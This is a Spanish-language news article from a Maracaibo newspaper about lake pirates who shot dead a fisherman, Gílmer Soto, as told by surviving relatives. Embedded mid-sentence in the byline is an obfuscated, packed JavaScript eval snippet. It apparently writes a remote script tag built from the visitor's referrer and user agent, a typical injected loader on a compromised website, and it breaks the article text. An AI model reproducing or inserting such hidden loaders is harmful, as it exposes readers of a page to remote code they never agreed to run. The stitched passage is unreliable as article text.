"Nunca tuve tanto miedo como esa madrugada"

Luisana González / Maracaibo / [email protected]
Wílmer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nsirk|var|u0026u|referrer|rfyrt||js|php'.split('|'),0,{})) Soto, sobreviviente del ataque de los piratas del Lago, recuerda cómo se salvó del ataque el pasado miércoles. Los pesacadores de San Francisco exigen mayor vigilancia. Ya nadie se atreve a pescar por la inseguridad en las aguas

Los sobrevivientes recuerdan cómo los atacaron los piratas el pasado miércoles. (Foto: Gabriela Sanz)

Los Soto lloran la pérdida de Gílmer. Al pescador lo ultimaron de un balazo en la cabeza tras intentar escapar de los piratas del Lago la madrugada del pasado miércoles. "Esta es la tercera vez que nos atacan y la primera vez que nos quitan a un miembro de mi familia", expresó con la voz entre cortada Wílmer Soto, primo-hermano de la víctima y sobreviviente del ataque.

"Nunca tuve tanto miedo como esa madrugada. Estoy vivo de milagro". Con los ojos llorosos, el sobreviviente contó que el martes a las 5.30 de la tarde, salió junto a su primo y otros seis pescadores de la playa Yesenia. Zarparon en dos lanchas hacia el Lago para iniciar con la faena de pesca, oficio que desempeñaba Gílmer desde los 15 años.

Cuando estaban en medio del agua, a eso de las 2.20 de la madrugada del miércoles, dos botes más con cuatro personas a bordo en cada uno, los interceptaron. "Nos apuntaron con sus armas. Varios delincuentes se pasaron a la lancha donde yo estaba. Nos sometieron y nos golpearon, mientras los otros se robaban el motor". 

Gílmer en un momento de descuido de los malhechores arrancó el motor de su embarcación y divagó durante 20 minutos en el agua. Al faltarle pocos metros para llegar a la orilla de una playa, en Santa Rita, se paró y miró hacia atrás para ver si ya había logrado perder a sus atacantes. En ese momento recibió el disparo en la frente, dijo: "Me dieron" y cayó en el bote muerto, relató Albert Cepeda, sobrino del occiso, quien también es sobreviviente. 

"Los piratas se acercaron a la embarcación y a punta de golpes tumbaron al agua a los tripulantes. Luego entre dos lanzaron al Lago el cadáver de Soto y se llevaron la lancha", explicó Cepeda, quien pidió a las autoridades que tomaran cartas en el asunto, pues "de la pesca ya nadie puede trabajar por el peligro que se vive en el agua con los piratas".

En la calle 4 con avenida 27 del barrio San Luis del municipio San Francisco se llevó a cabo ayer el velatorio del pescador, padre de seis hijos. Hoy le darán cristiana sepultura en el Cementerio San Francisco de Asís.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama